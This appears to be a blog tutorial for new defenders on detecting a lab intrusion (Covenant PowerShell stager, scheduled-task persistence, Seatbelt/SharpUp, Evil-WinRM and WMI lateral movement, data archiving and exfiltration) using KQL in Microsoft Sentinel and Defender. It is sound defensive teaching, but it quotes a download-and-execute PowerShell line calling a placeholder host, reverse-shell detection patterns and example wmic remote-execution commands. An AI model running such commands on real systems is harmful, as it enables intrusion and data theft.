Welcome back to our series! In Part 6, we walked through how the Red Team compromised our lab environment – John’s computer test001 – using a Covenant Grunt (malicious agent), established persistence with a scheduled task, escalated privileges (with tools like Seatbelt/SharpUp), moved laterally via Evil-WinRM and WMI, and finally staged/exfiltrated data. In Part 7, we switch hats to the Blue Team side. We’ll step through detecting each of those activities using Microsoft Defender XDR (Defender for Endpoint) and Microsoft Sentinel.

We aim to help new IT defenders learn how to spot these attacker footprints and respond effectively. We’ll use friendly, straightforward language and focus on actionable steps – including plenty of Kusto Query Language (KQL) queries you can run in Sentinel or Defender’s hunting console. Let’s dive in!

Initial Investigation: Leveraging Defender for Endpoint (XDR)

Before crafting queries, it’s wise to get an overview of what happened on the compromised host. Microsoft Defender for Endpoint provides a device timeline view that shows a chronological list of events on test001. By opening John’s machine in the Defender portal and selecting the Timeline tab, we can see suspicious activities at a glance. For example, you might notice entries like “powershell.exe ran PowerShell command: ‘Get-WmiObject’” or “schtasks.exe created” – clues correlating with the Red Team’s actions.

You can filter by dates and look for specific event types or MITRE technique tags on the timeline. In our case, around the time of compromise, the timeline for test001 would likely show events such as: a PowerShell session started (the Covenant stager), a new scheduled task registered, suspicious executables (Seatbelt/SharpUp) running, remote connection events (WinRM/WMI), and file archive creation. These visual cues help us form a hypothesis: John’s PC was running unusual PowerShell code, a scheduled task appeared, hacking tools ran, and connections to another host and outbound network activity occurred.

With this context in mind, we’ll now construct targeted Sentinel queries to hunt each of these activities across our environment. These KQL queries can be run in the Sentinel Logs blade (or in Defender’s Advanced Hunting) to validate and find evidence of malicious actions.

Detecting C2 Activity & Suspicious PowerShell Execution

One of the first things to check is suspicious PowerShell usage since our Red Team used a Covenant Grunt (likely injected via PowerShell). Malicious PowerShell often leaves telltale signs:

  • Encoded Commands: Attackers use the -EncodedCommand flag to run base64-encoded payloads. Legitimate admins rarely do this, so its presence is a red flag.
  • Network Calls: The Grunt might use PowerShell to call out to a C2 server (e.g. via Invoke-WebRequest or .NET WebClient).
  • In-Memory Assembly Load: Covenant’s PowerShell launcher might reflectively load a .NET assembly (which could appear in logs as System.Reflection.Assembly::Load, another suspicious pattern).

Let’s start with a query to hunt for PowerShell process launches with encoded commands in Windows security events (event ID 4688, “process creation”, with command-line logging enabled):


SecurityEvent
| where EventID == 4688
| where Process has "powershell.exe"
| where CommandLine has "-EncodedCommand"

This will return any processes where powershell.exe was started with an EncodedCommand argument – a strong indicator of obfuscated PowerShell often used by malware or C2 loaders. In our lab, this query should flag the Covenant launcher on test001 (run by John) since Covenant’s PowerShell one-liner likely used a long encoded string to initialize the Grunt.
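When triaging a hit, the next step is to decode the base64 payload. Keep in mind that PowerShell’s -EncodedCommand expects base64 over UTF-16LE, not UTF-8, so a naive decode produces garbage. A quick, hypothetical Python helper (the function name is ours, not from any Microsoft tooling):

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument.

    PowerShell base64-encodes the script as UTF-16LE, so a plain
    UTF-8 decode would produce interleaved null bytes.
    """
    return base64.b64decode(b64).decode("utf-16-le")

# Round-trip a sample one-liner the way an encoder would produce it.
sample = 'IEX (New-Object Net.WebClient).DownloadString("http://example.test/a")'
encoded = base64.b64encode(sample.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(encoded))
```

Decoding the payload often reveals the C2 URL or the reflective load immediately, which saves you from staring at a wall of base64.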

We can broaden the search for other suspicious PowerShell commands. For example, Red Teams often download payloads via PowerShell. We might hunt for keywords like IEX (Invoke-Expression) or Web client usage. Another example is looking for specific malicious snippets; in Microsoft’s Hafnium investigation, they provided a query to catch a reverse shell invocation in PowerShell:


SecurityEvent
| where EventID == 4688
| where Process has_any ("powershell.exe", "PowerShell_ISE.exe")
| where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"

This query was used to detect Nishang reverse shells. We can adopt similar logic to find Covenant-related activity. Covenant’s PowerShell stager might not use the exact string above, but it could use .Net.WebClient or other network calls. So a more generic hunt could be:


SecurityEvent
| where EventID == 4688
| where Process has "powershell.exe"
| where CommandLine has_any ("Invoke-WebRequest", "New-Object Net.WebClient", "IEX", "System.Reflection.Assembly")

This query looks for any PowerShell execution that includes typical malicious patterns: using WebRequest/WebClient (file download/upload), IEX (often used to execute fetched code), or Assembly loading (common for fileless malware injection). If PowerShell Script Block Logging (Event ID 4104) is enabled, you could search those events for keywords like Compress-Archive or suspicious function calls.

What to look for: In test001’s results, you may find a PowerShell command loaded Covenant. For instance, an event showing PowerShell with a very long encoded command or contacting an unfamiliar external URL is likely our Grunt’s launch. Note the timestamp and user (it should be John’s account)—we’ll use this to correlate with subsequent actions.

Defender XDR tip: If cloud protection caught the alert in the Defender portal, it might have been generated for “Suspicious PowerShell command” or “PowerShell Downloader.” Even if not, the Device timeline would list the PowerShell command line (possibly flagged with a technique like Execution). You can click that event and see details such as the entire command and any associated network connections. This is a great starting point for pivoting into deeper hunting.

Hunting Persistence: Scheduled Task Creation

In Part 6, the attacker set up a scheduled task on John’s machine for persistence. As defenders, we want to detect such activity. Windows logs an event whenever a new scheduled task is created: Event ID 4698 (“A scheduled task was created”) in the Security log. We can query Sentinel for this:


SecurityEvent
| where EventID == 4698
| where Computer == "test001"

This will return any task creation events on the compromised host. We’ll likely find an event around the time of John’s compromise, and it should contain details about the task name and the user who created it.

To make the analysis more manageable, we can parse the event data (XML) to extract key fields like the task name and the creating user:


SecurityEvent
| where EventID == 4698
| parse EventData with * '<Data Name="TaskName">' TaskName '</Data>' *
| parse EventData with * '<Data Name="SubjectUserName">' User '</Data>' *
| project TimeGenerated, Computer, User, TaskName

This query will list when the task was created, on which computer, by which user, and the task’s name. In our scenario, we might see something like: TimeGenerated: 2025-03-10 14:05:23, Computer: test001, User: John, TaskName: \Microsoft\Windows… (some name likely used by the attacker). If the Red Team tried to blend in, the task name might mimic a legit system task, but it will stand out as something new.
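The same extraction is easy to prototype offline if you export raw events. A minimal sketch using Python’s standard XML parser — the sample payload below is hypothetical and trimmed, but the field names (TaskName, SubjectUserName) match what Windows actually logs in a 4698 record:

```python
import xml.etree.ElementTree as ET

# Hypothetical, trimmed EventData payload from a 4698 record.
event_data = r"""
<EventData>
  <Data Name="SubjectUserName">John</Data>
  <Data Name="SubjectDomainName">LAB</Data>
  <Data Name="TaskName">\Microsoft\Windows\UpdateCheck</Data>
</EventData>
"""

def extract_fields(xml_text, wanted):
    """Return the requested <Data Name=...> values as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): d.text
            for d in root.iter("Data") if d.get("Name") in wanted}

fields = extract_fields(event_data, {"TaskName", "SubjectUserName"})
print(fields)
```

This mirrors what the KQL parse statements do: pick the interesting name/value pairs out of the EventData XML.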

What to look for: Verify if John (or a process running as John) created a new task. If yes, that’s a significant find – it confirms persistence. Note the TaskName. You can further investigate that task on the endpoint (e.g. via the Task Scheduler library or schtasks /query) to see what program or script it runs. In our case, it might point to a file or command that re-launches the Covenant Grunt.

Defender XDR tip: Microsoft Defender for Endpoint can sometimes flag this behavior (e.g. “Scheduled task created by suspicious process”). On the device timeline, you would also see an event like “schtasks.exe created a scheduled task” around that time. This gives a quick visual cue in the portal. We can also use Advanced Hunting in Defender with a similar KQL (the schema DeviceProcessEvents can capture the schtasks.exe execution). For instance, a query like:


DeviceProcessEvents
| where FileName == "schtasks.exe" and ProcessCommandLine contains " /Create "
| where DeviceName == "test001"

would catch the task creation command. Combining both approaches – Sentinel log search and Defender’s timeline – confirms that persistence was established.

Spotting Privilege Escalation Attempts (Seatbelt & SharpUp)

After persistence, our attacker ran Seatbelt and SharpUp – two reconnaissance and privilege escalation tools. These tools might not directly raise obvious alerts, but they do leave artifacts we can detect:

  • Process Executions: If these executables ran on disk, we can find their process executions by name (unless renamed).
  • Command-line Patterns: Seatbelt’s usage of certain flags can be searched for even if renamed.
  • Unusual Activities: These tools query system info, which might trigger Windows Event logs (for example, Seatbelt checking auto-logon registry or SharpUp looking at AlwaysInstallElevated settings).

1. Detect by process name: Easiest case – search for any process with names containing “Seatbelt” or “SharpUp”:


SecurityEvent
| where EventID == 4688
| where Process has_any ("Seatbelt.exe", "SharpUp.exe")

In our lab, if the Red Team ran the publicly named binaries, this query will surface those executions. For example, Seatbelt.exe launched from John’s user profile or temp directory. Even one hit is significant, as these are generally absent on user machines.

2. Detect by command-line usage: Adversaries sometimes rename these tools to evade simple name-based detection. However, Seatbelt in particular often uses distinctive command-line options. For instance, running all checks with Seatbelt uses group=all (or other group names), and output is often saved via outputfile=<file>. We can hunt for those substrings in process command lines:


SecurityEvent
| where EventID == 4688
| where CommandLine has_any ("-group=", "-outputfile=", "Seatbelt.exe")

This checks for any process launch (not just PowerShell, any process) that has “-group=” or “-outputfile” in its parameters (or is explicitly named Seatbelt). Such patterns are uncommon in standard software. Here is an example from an actual attack: an attacker ran Seatbelt.exe -group=all -outputfile C:\Temp\result.txt – very noisy and easy to spot. Our query would catch that.
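The same has_any logic is easy to replay offline against exported command lines, for example when testing a detection idea before turning it into a rule. A minimal sketch (substring list mirrors the query above; the function name is ours):

```python
# Substrings mirroring the KQL has_any list above (matched case-insensitively).
SUSPICIOUS_SUBSTRINGS = ("-group=", "-outputfile", "seatbelt", "sharpup")

def is_suspicious_cmdline(cmdline: str) -> bool:
    """Flag command lines containing Seatbelt/SharpUp-style artifacts."""
    lowered = cmdline.lower()
    return any(s in lowered for s in SUSPICIOUS_SUBSTRINGS)

print(is_suspicious_cmdline(r"Seatbelt.exe -group=all -outputfile C:\Temp\result.txt"))  # True
print(is_suspicious_cmdline(r"C:\Windows\System32\notepad.exe report.txt"))  # False
```

Substring heuristics like this are cheap but noisy; in production you would baseline them against your environment first.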

For SharpUp, the approach is similar: search for the name if possible. SharpUp doesn’t have as many apparent flags since it primarily enumerates and possibly attempts known escalation techniques. If it was executed, we should see a process for it. Use the name query above (including “SharpUp.exe”). Additionally, check if any unusual privilege escalation alerts are triggered. Defender for Endpoint might flag specific behavior (e.g. a suspicious privilege token manipulation or a known UAC bypass attempt) depending on what SharpUp did.

What to look for: Identify any events where these tools ran. Confirm the user context (likely John) and the timestamp. If found, it indicates the attacker was actively scouting for ways to elevate privileges on test001. Also, see what the parent process was—was it launched via PowerShell or cmd.exe? For example, if our earlier query shows powershell.exe spawning Seatbelt.exe, that ties it back to the malicious PowerShell session (Covenant). Each piece reinforces the timeline of the attack.

Defender XDR tip: While generic EDR might not outright tag “This is Seatbelt”, the Defender sensor could detect it as a hack tool. Check if any Defender AV detections were logged on test001 (sometimes these tools get detected as HackTool or similar). Even if not, in the Advanced Hunting console, we could run:


DeviceProcessEvents
| where FileName in~ ("Seatbelt.exe", "SharpUp.exe")

to search across all devices. This can reveal if the attacker tried the tools elsewhere, too.

Identifying Lateral Movement (Evil-WinRM & WMI)

Our attacker didn’t stop at John’s machine – they moved laterally to another system using Evil-WinRM (PowerShell Remoting) and possibly WMI. Detecting lateral movement is critical, as it means the compromise is spreading. We have several angles to catch this:

Detecting Evil-WinRM (Remote PowerShell Sessions)

Evil-WinRM is essentially a PowerShell Remoting client. When used on the target machine, it results in a WinRM service session that launches a PowerShell process under the hood. There are a few indicators:

  • A logon event (4624) appears for the user on the target with Logon Type = 3 (network), and the Authentication Package might show Negotiate (for Kerberos/NTLM).
  • The process wsmprovhost.exe (the WinRM provider host) will spawn a child process (usually powershell.exe, or cmd.exe if commands are run).
  • The PowerShell Operational log (if enabled) may record that a remote session was created (with the connecting user).

A straightforward way with Defender data is to look for processes started by wsmprovhost.exe (i.e. processes where that is the parent):

DeviceProcessEvents
| where InitiatingProcessFileName =~ "wsmprovhost.exe"
| where FileName == "powershell.exe" or FileName == "cmd.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, InitiatingProcessAccountName

This advanced hunting query will list any PowerShell or cmd processes launched by wsmprovhost.exe (indicating a remote PowerShell session on that device). In a typical environment, you wouldn’t expect many instances of WinRM launching shells, so any result is worth investigating. In our case, if the attacker used Evil-WinRM to get into, say, server02 with John’s credentials, we would see on server02 that wsmprovhost.exe (WinRM) started a powershell.exe process running as John (or as the stolen admin account).

You can use Windows Event Logs via Sentinel if you don’t have Defender data. You might search for Logon events on other machines:


SecurityEvent
| where EventID == 4624
| where Account has "John" // Account is logged as DOMAIN\user, so match on the username
| where Computer != "test001"
| where LogonType == 3 // network logon (e.g. WinRM)

This would show if John’s account logged into any other host (e.g. server02) over the network around the attack timeframe. If you find a successful login for John on a server he doesn’t normally access, followed by a series of commands, that’s a big clue for lateral movement.

What to look for: Identify the first event where John’s account appears on the target machine’s timeline (or logs). It might be a 4624 logon or a process starting as John at an odd time. Using the above DeviceProcessEvents query, you’ll likely see something like: Time X, Device = server02, InitiatingProcessFileName = wsmprovhost.exe, FileName = powershell.exe, AccountName = John. That means John initiated a remote PowerShell. That’s Evil-WinRM in action.
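If you export DeviceProcessEvents rows (say, as CSV or JSON from the hunting console), the same parent-child filter is trivial to replay offline. A hypothetical sketch with made-up rows whose field names follow the DeviceProcessEvents schema:

```python
# Hypothetical exported rows (field names follow DeviceProcessEvents).
events = [
    {"DeviceName": "server02", "InitiatingProcessFileName": "wsmprovhost.exe",
     "FileName": "powershell.exe", "AccountName": "John"},
    {"DeviceName": "test001", "InitiatingProcessFileName": "explorer.exe",
     "FileName": "powershell.exe", "AccountName": "John"},
]

def remote_shell_hits(rows):
    """Keep rows where WinRM's provider host spawned a shell."""
    return [r for r in rows
            if r["InitiatingProcessFileName"].lower() == "wsmprovhost.exe"
            and r["FileName"].lower() in ("powershell.exe", "cmd.exe")]

for hit in remote_shell_hits(events):
    print(hit["DeviceName"], hit["AccountName"])
```

Only the server02 row survives the filter – exactly the Evil-WinRM pattern described above.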

Detecting WMI Usage for Lateral Movement

Attackers might also use WMI to execute commands on remote machines (for example, using the wmic command or PowerShell’s Invoke-WmiMethod). WMI usage can be detected by watching the WMI provider process spawn other processes on the target, or by catching the WMI command itself on the source machine.

Option 1: Child processes of WMI provider – When a remote WMI call executes a process on a target, the process wmiprvse.exe (WMI provider) will spawn the requested program. We can hunt for WMI spawning standard tools (like cmd or powershell):


DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName in~ ("cmd.exe", "powershell.exe", "wsmprovhost.exe", "rundll32.exe", "mshta.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, InitiatingProcessAccountName

This uses a heuristic: WmiPrvSE shouldn’t usually spawn those binaries, so if it does, it’s likely a remote execution via WMI. For example, user John’s result showing wmiprvse.exe -> cmd.exe /c whoami on server02 would indicate that John executed a command on server02 using WMI.

Option 2: WMI command usage – On the source machine (test001), if the attacker ran the wmic tool for remote execution, we can catch that in the command line. A classic WMI lateral movement command is: wmic /node:"TargetHost" process call create "command to run". We can search 4688 events on test001 for any use of process call create:


SecurityEvent
| where EventID == 4688
| where Process has "wmic.exe"
| where CommandLine contains "process call create"

This will flag any WMIC usage that spawns a remote process. An event like this on test001, under John’s account and pointing at another host, is precisely what WMI lateral movement looks like.

What to look for: Combine the evidence from the source and target. If John’s machine shows wmic … process call create “powershell.exe” targeting server02, and server02 shows WmiPrvSE launching PowerShell as John at that time, you’ve confirmed the attacker used WMI to move laterally. Note the target machine name and commands run – the attacker might have created another Grunt on that machine or executed a payload there.

Defender XDR tip: Microsoft Defender for Endpoint would record these events, too. On the target device’s timeline, you might see “Process created via WMI” or even a specific alert if it was known to be malicious. Advanced hunting can unify this by looking at DeviceProcessEvents for parent-child relationships as we did or using DeviceNetworkEvents if WMI was executed over SMB (it might not show the network as it uses RPC). In any case, the Incident feature in Microsoft 365 Defender might automatically correlate John’s suspicious activities on multiple machines into a single incident, which is helpful for analysts to see the lateral movement path.

Detecting Data Staging & Exfiltration

Finally, the Red Team in Part 6 gathered data and exfiltrated it. They used PowerShell’s Compress-Archive to zip files, possibly transferring that archive out. Let’s break down the detection of data staging (archiving) and data exfiltration:

Detecting Archive Creation (Data Staging)

When attackers bundle up data (e.g. Compress-Archive or using tar/zip utilities), they might leave some clues:

  • PowerShell logs: If script block logging is on, Event ID 4104 would show Compress-Archive usage with paths of files being archived.
  • File creation events: If file monitoring is in place, a new .zip or .7z file appearing in an unusual directory (like a user’s temp folder) could be caught.
  • Process activity: A process like powershell.exe writing a large file.

Using Sentinel, if we have PowerShell logs, we can search for the Compress-Archive cmdlet:


Event
| where Source == "Microsoft-Windows-PowerShell" // 4104 lives in the PowerShell Operational log, not the Security log
| where EventID == 4104
| where RenderedDescription contains "Compress-Archive"

This would list any PowerShell script blocks that include that cmdlet. In our case, John’s account on test001 likely ran something like Compress-Archive -Path C:\Data\Sensitive -DestinationPath C:\Users\John\Documents\data.zip. The script block text would reveal those paths.
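Once a hit surfaces, you usually want the source and destination paths out of the command line quickly. A small, hypothetical regex helper (parameter handling is deliberately simplified – quoted paths containing spaces would need more care):

```python
import re

# Hypothetical script-block text recovered from a 4104 event.
block = (r"Compress-Archive -Path C:\Data\Sensitive "
         r"-DestinationPath C:\Users\John\Documents\data.zip")

def archive_paths(script_block):
    """Pull -Path and -DestinationPath arguments from a Compress-Archive call."""
    src = re.search(r"-Path\s+(\S+)", script_block)
    dst = re.search(r"-DestinationPath\s+(\S+)", script_block)
    return (src.group(1) if src else None,
            dst.group(1) if dst else None)

source, destination = archive_paths(block)
print(source, destination)
```

The destination path tells you where to look on disk for the staged archive; the source path tells you what data the attacker was after.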

If 4104 logs aren’t available, another approach is to look at file creation via Defender for Endpoint telemetry. For example:


DeviceFileEvents
| where FileName endswith ".zip" or FileName endswith ".7z"
| where InitiatingProcessFileName =~ "powershell.exe" and InitiatingProcessAccountName =~ "john"
| where DeviceName == "test001"

This query (in Defender hunting) checks if PowerShell created any ZIP/7Z files on John’s PC. If the Red Team archived data, it should show up here with the file path and timestamp.

What to look for: Identify any archive files created on test001 that coincide with the attack timeline. If you find one (say data.zip), that’s likely the staged data ready for exfiltration. Take note of its location and size if possible. This is evidence of data collection. In an investigation, you’d want to secure a copy of that archive to see what was taken.

Detecting Exfiltration (Data Transfer Out)

Detecting exfiltration can be tricky, but there are a few angles:

  • Network connections: Look at outbound connections from test001 (or whichever system had the data). If the Covenant Grunt exfiltrated data, it might be sent over the established C2 channel (which could be an HTTP/S request). Alternatively, the attacker might upload to an external server or cloud service.
  • Large data transfers: Check for vast volumes of data egress or uncommon destinations.
  • Known exfil tools: e.g., using Invoke-WebRequest or curl to post to an external site or cloud drive clients running unexpectedly.

If firewall or proxy logs are ingested using Sentinel, one could query those for test001’s traffic. But sticking to our tools at hand, we can leverage Defender’s network telemetry:


DeviceNetworkEvents
| where DeviceName == "test001"
| where RemoteIPType == "Public" // exclude internal traffic
| summarize ConnectionCount = count() by RemoteIP, RemoteUrl, RemotePort
| sort by ConnectionCount desc

This query counts test001’s outbound connections to public IPs, sorted by frequency. Note that DeviceNetworkEvents does not record transfer sizes, so for actual byte volumes you would lean on firewall or proxy logs; even so, a C2 or exfiltration destination tends to surface here as repeated connections to an IP or URL your environment doesn’t normally contact. For example, if the attacker uploads the ZIP to a cloud service or sends it back to their C2, that destination should stand out.

Even if the volume isn’t huge, look for any unusual external connections from test001 that weren’t present before. Covenant C2 traffic might stand out by connecting to an IP or domain not typically seen in your environment. For instance, if Covenant used HTTPS to a custom domain, you’d catch that domain in RemoteUrl. Also, if they used a tool like Invoke-WebRequest to upload data to a file-sharing site (e.g. an API call to Dropbox or an HTTP PUT to some server), that would appear.
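The aggregation is straightforward to reproduce on exported rows as well. A hypothetical sketch that keeps only public destinations and ranks them by connection count (the rows are illustrative):

```python
from collections import Counter
from ipaddress import ip_address

# Hypothetical exported network events for test001.
rows = [
    {"RemoteIP": "2.2.2.2", "RemotePort": 443},
    {"RemoteIP": "10.0.0.5", "RemotePort": 445},
    {"RemoteIP": "2.2.2.2", "RemotePort": 443},
    {"RemoteIP": "2.2.2.2", "RemotePort": 443},
]

# Drop RFC 1918 destinations, then rank the rest by frequency.
external = [(r["RemoteIP"], r["RemotePort"]) for r in rows
            if not ip_address(r["RemoteIP"]).is_private]
for dest, count in Counter(external).most_common():
    print(dest, count)
```

Here only 2.2.2.2:443 survives the private-address filter, mirroring what the RemoteIPType filter does in the query above.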

What to look for: Identify the destination of the exfiltration. Suppose you see test001 sent a few megabytes of data to 2.2.2.2 on port 443 at the time corresponding to after the archive was created—that’s a strong sign of exfiltration. Without apparent volume, even a connection to an IP or domain that is known bad or not associated with your org is a clue (you might cross-reference it with threat intelligence feeds).

Defender XDR tip: The Defender for Endpoint portal might have raised an alert like “Potential data exfiltration” if it recognized a large transfer or a known malicious domain. But if not, you can manually investigate network events via the device timeline. The timeline lists each process’s connections (with addresses and ports). If you click on the timeframe after the archive creation, you might see events like powershell.exe connecting to <IP> or a browser connecting to johnwantsyourstuff.com (just an example). Defender also sometimes tags connections with “Remote IP flagged as C2” if it’s known. All these help confirm whether data likely left the network and where it went.

Tying It All Together: Building the Incident Timeline

Now that we’ve gone through each tactic (C2 execution, persistence, escalation, lateral movement, exfiltration) individually, it’s essential to piece the puzzle together. As a defender, you want to reconstruct the attack timeline and understand the scope:

  • Initial Compromise: John’s account or machine was compromised at Time A (possibly via phishing or an exploit not covered in this post). We see Covenant Grunt activity starting then.
  • C2 Beacon/PowerShell: At Time B, a suspicious PowerShell session (Covenant) started on test001 (we detected via encoded command in logs).
  • Persistence: Minutes later, at Time C, a scheduled task was created under John’s account on test001 (ensuring the attacker can regain access).
  • Privilege Escalation: Around Time D, Seatbelt/SharpUp ran, indicating the attacker was trying to become admin on test001. If they succeeded (say they found admin credentials in memory or a misconfiguration), you might see subsequent events as SYSTEM or another admin user.
  • Lateral Movement: At Time E, the attacker accessed another system (server02) via Evil-WinRM/WMI using John’s credentials or stolen creds. We saw John’s account log into server02 and execute processes there.
  • Data Access & Exfiltration: Finally, at Time F, on whichever system had the target data (it could still be test001 or the lateral target), they gathered files (Compress-Archive) and exfiltrated them to their server at Time G.

We create a narrative of the incident by writing down these times and events. This helps immensely in reporting and understanding the impact. Microsoft Sentinel can help correlate some of this if you create an Incident and attach relevant alerts or bookmarks for each stage. Microsoft 365 Defender might automatically group these into a single incident if the alerts are linked (for example, it might show an incident with alerts for “Malicious PowerShell”, “Suspicious Scheduled Task”, “Possible Credential Dump”, “Lateral Movement”, etc., all tied to the same overall breach).
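Mechanically, building that narrative is just sorting your tagged findings by timestamp. A toy sketch (the times and descriptions are illustrative, not real incident data):

```python
from datetime import datetime

# Hypothetical findings from the hunts above, tagged by tactic.
findings = [
    ("2025-03-10T14:05:23", "Persistence", "Scheduled task created on test001"),
    ("2025-03-10T14:01:02", "Execution", "Encoded PowerShell (Covenant stager) on test001"),
    ("2025-03-10T14:40:11", "Lateral Movement", "wsmprovhost.exe spawned powershell.exe on server02"),
]

# Sort chronologically to reconstruct the incident timeline.
timeline = sorted(findings, key=lambda f: datetime.fromisoformat(f[0]))
for ts, tactic, detail in timeline:
    print(f"{ts}  {tactic}: {detail}")
```

Keeping findings in a structured form like this also makes it easy to paste the timeline into an incident report or attach it to a Sentinel bookmark.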

Triage and Incident Response Tips for New Defenders:

  • Validate and Double-Check: When a query shows a suspicious event, drill down. For example, if a scheduled task event appears, open its details to see the task name and what action it was set to perform. This confirms if it’s malicious (e.g., runs a weird PowerShell script from Temp). Similarly, if you find a process like Seatbelt, check the file path – is it in an unusual location like C:\Users\John\Downloads\seatbelt.exe? Context matters.
  • Use the Timeline and Cross-References: We used both Sentinel queries and the Defender timeline. Use them together. If a Sentinel query finds something on server02, go to Defender, open server02’s timeline around that timestamp, and see what else happened. Maybe you’ll find the attacker created a new user or dumped credentials on that machine, too. Hunting is an iterative process.
  • Containment Actions: While hunting, be ready to respond. For instance, once you confirm Covenant is running on test001, you can take immediate action: isolate the machine via Defender for Endpoint (network isolation feature), or kill the malicious process if possible. Similarly, disable John’s account if it’s been compromised for lateral movement.
  • Capture Artifacts: Export relevant logs or save query results for evidence. Safely download that suspicious ZIP file (if still on disk) for analysis. These will be useful for post-incident analysis and lessons learned (and maybe forensics).
  • Mitigate and Remediate: After identifying all malicious tasks, processes, and accounts involved, remove or clean them. Delete the scheduled task, remove any backdoor accounts or tools left behind, and reset compromised credentials (John’s password or any other accounts the attacker used). Also, patch the vulnerabilities or misconfigurations that allowed the breach (for example, if SharpUp found AlwaysInstallElevated was enabled and the attacker used it, that setting should be fixed).
  • Learn and Improve: Each manual detection we make can potentially be turned into a continuous detection rule. For instance, create a Sentinel Analytics Rule for Event ID 4698 (task creation) so it alerts you next time, or a rule for wsmprovhost.exe spawning powershell.exe to catch remote PowerShell usage. This way, your SOC is better prepared for the future.

Throughout this investigation, we saw how important it is to have visibility (through logging and EDR) and to know where to look for evidence. By mastering a few KQL queries and understanding the Windows events behind attacker techniques, even a newcomer to threat detection can unravel a complex attack.

Conclusion

In Part 7, we successfully detected the Red Team’s actions from Part 6 using Microsoft Defender XDR and Sentinel. We identified the Covenant Grunt’s PowerShell activity, caught the scheduled task persistence, spotted the Seatbelt/SharpUp reconnaissance, traced the lateral movement via Evil-WinRM and WMI, and flagged possible data exfiltration. More importantly, we tied these findings into a coherent story of the intrusion, which is crucial for effective incident response.

For new defenders: Take it step-by-step, use the tools at your disposal (the Defender portal’s insights and Sentinel’s powerful queries), and don’t be afraid to dig into logs—they will tell the tale of the attack. With practice, formulating hypotheses (“Did the attacker create a scheduled task? Let’s check 4698 events…”) and confirming them with data becomes second nature.

By implementing the detection queries and investigation tips above, your Blue Team should be well-equipped to detect similar attack patterns. This wraps up our series – from initial compromise to attacker tactics and the defender’s answer – highlighting that we can turn the tables on attackers and protect our environments with the right approach and tools. Stay safe, and happy hunting!

Sources: The KQL queries and techniques discussed were informed by Microsoft and community best practices for threat hunting. For example, searching for encoded PowerShell commands and specific malicious patterns is a known effective tactic, Windows event 4698 is a key indicator for new scheduled tasks, parent-child process relationships (WmiPrvSE or WsmProvHost spawning others) reveal lateral movement, and command-line artifacts from tools like Seatbelt can unmask attacker activity. These sources reinforce the detections we implemented above.  Remember, this is companion content to our new Red and Blue Teaming with Defender XDR book.

Thanks,

John Sr.